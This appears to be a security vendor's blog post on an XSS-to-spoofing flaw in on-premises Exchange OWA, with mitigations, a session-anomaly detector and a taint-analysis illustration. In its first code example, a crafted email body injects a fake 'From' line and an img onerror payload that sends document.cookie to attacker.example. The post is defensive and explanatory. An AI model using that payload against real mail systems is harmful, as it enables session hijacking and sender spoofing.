Vulnerability Analysis · 2026-05-16 · 5 min read

Exchange Server XSS-to-Spoofing: CVE-2026-42897 Added to CISA KEV

A cross-site scripting flaw in on-premises Microsoft Exchange Server enables email spoofing via crafted messages. CISA added it to KEV on May 15 with a May 29 federal deadline.

The Vulnerability

On May 15, 2026, CISA added CVE-2026-42897 to its Known Exploited Vulnerabilities (KEV) catalog. The vulnerability is a spoofing bug in on-premises Microsoft Exchange Server stemming from a cross-site scripting (XSS) flaw, carrying a CVSS score of 8.1 (High). Federal agencies must apply mitigations by May 29, 2026.

The attack vector is a crafted email message that, when rendered by Outlook Web Access (OWA), executes attacker-controlled JavaScript in the context of the victim's authenticated OWA session. No click on a link is required beyond opening the message, and the script runs with whatever mailbox permissions that user holds.

Why Exchange XSS Still Matters

On-premises Exchange Server remains widely deployed in government agencies, healthcare organizations, and financial institutions, environments where migration to cloud email is slow because of compliance requirements or air-gap policies. These are exactly the environments where an XSS-to-session-hijack chain has the highest impact, because the mailbox content is sensitive and the server often sits close to other critical identity infrastructure.

An attacker who achieves JavaScript execution in an OWA session can:

  • Read and send email as the victim
  • Access contacts and calendar data
  • Exfiltrate attachments
  • Pivot to other Exchange administrative functions if the victim has elevated privileges

The CWE Mapping

CWE-79 (Cross-site Scripting): The root cause. Input from email message content is rendered without adequate sanitization in the OWA web interface.

CWE-451 (User Interface Misrepresentation of Critical Information): The spoofing component. The XSS payload can modify the displayed sender, subject, and message content, making phishing indistinguishable from legitimate internal mail.

CWE-116 (Improper Encoding or Escaping of Output): The email rendering pipeline does not consistently encode HTML entities in message body content before insertion into the DOM.
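As an added illustration (not Exchange or OWA code, and not a reproduction of the actual CVE-2026-42897 payload), the following renders a message two ways: with the body concatenated raw, the CWE-116 pattern, and with every untrusted field passed through an HTML entity encoder. The message shape, the `escapeHtml` helper and the crafted body are constructed for the example; the body both injects a fake "From" line (the CWE-451 effect) and carries an event handler.

```javascript
// Added illustration (not Exchange or OWA code): a minimal message renderer
// that shows the CWE-116 failure (body inserted into markup without entity
// encoding) next to the encoded version. Message shape and payload are constructed.

// Encode the five characters that matter when untrusted text is placed inside
// an HTML element body or a double-quoted attribute.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

// Vulnerable renderer: the header fields are encoded, but the body is
// concatenated as-is. This is the CWE-116 pattern the CWE mapping describes.
function renderMessageUnsafe(msg) {
  return (
    '<div class="msg">' +
    `<div class="from">From: ${escapeHtml(msg.from)}</div>` +
    `<div class="subject">Subject: ${escapeHtml(msg.subject)}</div>` +
    `<div class="body">${msg.body}</div>` +
    '</div>'
  );
}

// Hardened renderer: every untrusted field goes through the encoder, so the
// body can only ever appear as text, never as markup.
function renderMessageSafe(msg) {
  return (
    '<div class="msg">' +
    `<div class="from">From: ${escapeHtml(msg.from)}</div>` +
    `<div class="subject">Subject: ${escapeHtml(msg.subject)}</div>` +
    `<div class="body">${escapeHtml(msg.body)}</div>` +
    '</div>'
  );
}

// Crude check: does the output contain an <img>/<script> tag, or any element
// start tag carrying an on* handler attribute? Only raw markup can match.
function containsInjectedMarkup(html) {
  return /<(img|script)\b|<\w+[^>]*\son\w+=/i.test(html);
}

// Constructed attacker message: the body closes the body <div>, injects a fake
// "From" line that reads as an internal sender (CWE-451), then adds an image
// whose error handler ships the session cookie off-host.
const craftedMessage = {
  from: 'attacker@example.net',
  subject: 'Payroll update',
  body:
    '</div><div class="from">From: ceo@corp.example</div>' +
    '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
};

console.log('vulnerable:\n' + renderMessageUnsafe(craftedMessage));
console.log('hardened:\n' + renderMessageSafe(craftedMessage));
```

In the vulnerable output the injected `From:` line is real markup that a reader cannot tell apart from the renderer's own header, which is why the bug is classified as spoofing and not only as XSS; in the hardened output the same bytes show up as literal text.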

Mitigation

  1. Apply the May 2026 Exchange cumulative update immediately.
  2. Restrict OWA access to managed devices. Content Security Policy headers can be added at the IIS level in front of the OWA virtual directory; deploy any policy in report-only mode first and test it against your Exchange build, because a policy that blocks OWA's own inline scripts will break the client before it blocks an attacker.
  3. Monitor for anomalous OWA sessions. Indicators include a single account active from unusual or multiple geographic origins inside a short window, bulk mailbox item access, and mailbox delegation changes made from a webmail session.
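As an added example of step 3 (not Exchange, OWA or Deva code), the following applies those three indicators to constructed access records. The record shape (`user`, `country`, `ts`, `action`), the one-hour window and the 50-item threshold are assumptions; map your own OWA, IIS or mailbox audit log fields onto them and tune the thresholds to your baseline.

```javascript
// Added example (not Exchange, OWA or Deva code): the three OWA session
// indicators from the mitigation list applied to constructed access records.
// Record shape, window size and thresholds are assumptions.

const DEFAULTS = {
  windowMs: 60 * 60 * 1000, // one hour
  bulkReadThreshold: 50,    // mailbox items read inside one window
};

// Audit actions treated as mailbox delegation changes (assumed names).
const DELEGATION_ACTIONS = new Set(['Add-MailboxPermission', 'Add-MailboxFolderPermission']);

// records: [{ user, country, ts (ISO 8601), action, detail? }]
// returns: [{ user, type, detail }]
function findAnomalousSessions(records, opts = {}) {
  const { windowMs, bulkReadThreshold } = { ...DEFAULTS, ...opts };

  // Group by account and attach a numeric timestamp for arithmetic.
  const byUser = new Map();
  for (const r of records) {
    if (!byUser.has(r.user)) byUser.set(r.user, []);
    byUser.get(r.user).push({ ...r, t: Date.parse(r.ts) });
  }

  const findings = [];
  for (const [user, recs] of byUser) {
    recs.sort((a, b) => a.t - b.t);

    // Indicator 1: the same account seen from two countries inside one window.
    for (let i = 1; i < recs.length; i++) {
      const prev = recs[i - 1];
      const cur = recs[i];
      if (cur.country !== prev.country && cur.t - prev.t <= windowMs) {
        const minutes = Math.round((cur.t - prev.t) / 60000);
        findings.push({ user, type: 'geo-velocity', detail: `${prev.country} -> ${cur.country} within ${minutes} min` });
        break;
      }
    }

    // Indicator 2: bulk item access, counted with a sliding window over reads.
    const reads = recs.filter((r) => r.action === 'ReadItem');
    for (let lo = 0, hi = 0; hi < reads.length; hi++) {
      while (reads[hi].t - reads[lo].t > windowMs) lo++;
      if (hi - lo + 1 >= bulkReadThreshold) {
        findings.push({ user, type: 'bulk-read', detail: `${hi - lo + 1} items read inside one window` });
        break;
      }
    }

    // Indicator 3: any delegation change on the mailbox.
    for (const r of recs) {
      if (DELEGATION_ACTIONS.has(r.action)) {
        findings.push({ user, type: 'delegation-change', detail: r.detail || r.action });
      }
    }
  }
  return findings;
}

// Constructed sample: alice's session hops countries in 12 minutes, bob reads
// 60 items in 30 minutes, carol's mailbox gets a new delegate, dave is normal.
const sampleRecords = [
  { user: 'alice', country: 'US', ts: '2026-05-16T09:00:00Z', action: 'ReadItem' },
  { user: 'alice', country: 'RO', ts: '2026-05-16T09:12:00Z', action: 'ReadItem' },
  ...Array.from({ length: 60 }, (_, i) => ({
    user: 'bob', country: 'US', action: 'ReadItem',
    ts: new Date(Date.UTC(2026, 4, 16, 9, 5, 0) + i * 30000).toISOString(),
  })),
  { user: 'carol', country: 'US', ts: '2026-05-16T10:02:00Z', action: 'Add-MailboxPermission',
    detail: 'FullAccess granted to eve' },
  { user: 'dave', country: 'US', ts: '2026-05-16T08:00:00Z', action: 'ReadItem' },
  { user: 'dave', country: 'US', ts: '2026-05-16T08:20:00Z', action: 'ReadItem' },
];

console.log(JSON.stringify(findAnomalousSessions(sampleRecords), null, 2));
```

The geo check deliberately compares consecutive records rather than the whole day, so a user who travels legitimately between sessions hours apart is not flagged; the bulk-read check is a sliding window, so a slow but steady mailbox crawl still trips it once enough items fall inside any one hour.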

How Deva Detects XSS Patterns

Deva taint-mode rules for CWE-79 track data flow from user-controlled input sources (request parameters, message content, form fields) through to output sinks (DOM insertion, template rendering, response bodies). The scanner identifies missing sanitization and encoding at each output point, with rules covering all major web frameworks.
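To make the source-to-sink idea concrete, here is an added teaching model of taint propagation over a tiny statement form. It is not Deva's engine or its rule syntax; the statement shapes, the source and sink kinds, and the sanitizer allowlist are all assumed. The point it adds to the paragraph is the one that matters for CWE-79 findings: only a recognised encoder clears taint, so a value that merely passes through `trim` still reaches the sink tainted.

```javascript
// Added illustration of taint-mode analysis over a tiny intermediate form.
// This is a teaching model, not Deva's engine or rule format; the statement
// shapes, source/sink kinds and the sanitizer allowlist are assumptions.

// Functions accepted as neutralising CWE-79 taint. Anything else (trim,
// toLowerCase, a bespoke "clean" helper) leaves the value tainted.
const HTML_SANITIZERS = new Set(['escapeHtml', 'encodeURIComponent', 'DOMPurify.sanitize']);
// Output points where HTML-tainted data is a finding.
const HTML_SINKS = new Set(['innerHTML', 'document.write', 'template.render']);

// program: array of statements in evaluation order.
//   { op: 'source',   dst, kind }      value from an untrusted origin
//   { op: 'assign',   dst, src? }      copy a variable (src omitted = constant)
//   { op: 'concat',   dst, srcs }      string concatenation of several variables
//   { op: 'sanitize', dst, src, fn }   dst = fn(src)
//   { op: 'sink',     src, kind }      value reaches an output point
function analyzeTaint(program) {
  const taint = new Map(); // variable -> { kind, line } of its originating source
  const findings = [];
  program.forEach((stmt, line) => {
    switch (stmt.op) {
      case 'source':
        taint.set(stmt.dst, { kind: stmt.kind, line });
        break;
      case 'assign':
        if (stmt.src !== undefined && taint.has(stmt.src)) taint.set(stmt.dst, taint.get(stmt.src));
        else taint.delete(stmt.dst);
        break;
      case 'concat': {
        // Any tainted operand taints the result; report the first origin found.
        const origin = stmt.srcs.map((v) => taint.get(v)).find(Boolean);
        if (origin) taint.set(stmt.dst, origin); else taint.delete(stmt.dst);
        break;
      }
      case 'sanitize':
        if (HTML_SANITIZERS.has(stmt.fn) || !taint.has(stmt.src)) taint.delete(stmt.dst);
        else taint.set(stmt.dst, taint.get(stmt.src)); // unknown function: taint flows through
        break;
      case 'sink':
        if (HTML_SINKS.has(stmt.kind) && taint.has(stmt.src)) {
          const origin = taint.get(stmt.src);
          findings.push({ line, sink: stmt.kind, variable: stmt.src, source: origin.kind, sourceLine: origin.line });
        }
        break;
      default:
        throw new Error(`unknown op ${stmt.op}`);
    }
  });
  return findings;
}

// Constructed program modelling an OWA-style rendering path: the message body
// reaches innerHTML once raw, once through a non-sanitizer, once encoded.
const sampleProgram = [
  { op: 'source', dst: 'body', kind: 'message.body' },
  { op: 'source', dst: 'subject', kind: 'message.subject' },
  { op: 'assign', dst: 'html', src: 'body' },
  { op: 'sink', src: 'html', kind: 'innerHTML' },              // finding: raw body
  { op: 'sanitize', dst: 'trimmed', src: 'body', fn: 'trim' },
  { op: 'sink', src: 'trimmed', kind: 'innerHTML' },           // finding: trim is not a sanitizer
  { op: 'sanitize', dst: 'safeBody', src: 'body', fn: 'escapeHtml' },
  { op: 'sanitize', dst: 'safeSubject', src: 'subject', fn: 'escapeHtml' },
  { op: 'concat', dst: 'card', srcs: ['safeSubject', 'safeBody'] },
  { op: 'sink', src: 'card', kind: 'innerHTML' },              // clean: both operands encoded
  { op: 'assign', dst: 'label', src: 'subject' },
  { op: 'sink', src: 'label', kind: 'console.log' },           // tainted, but not an HTML sink
];

console.log(JSON.stringify(analyzeTaint(sampleProgram), null, 2));
```

Each finding carries the sink line and the source line, which is what a reviewer needs to judge whether the path is real: the fix for the first two findings here is to route `body` through `escapeHtml` before it reaches `innerHTML`, exactly the encoding step CWE-116 describes as missing.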


Deva Security Team

Threat research, application security analysis, and defensive engineering insights from the DevSecCode team.
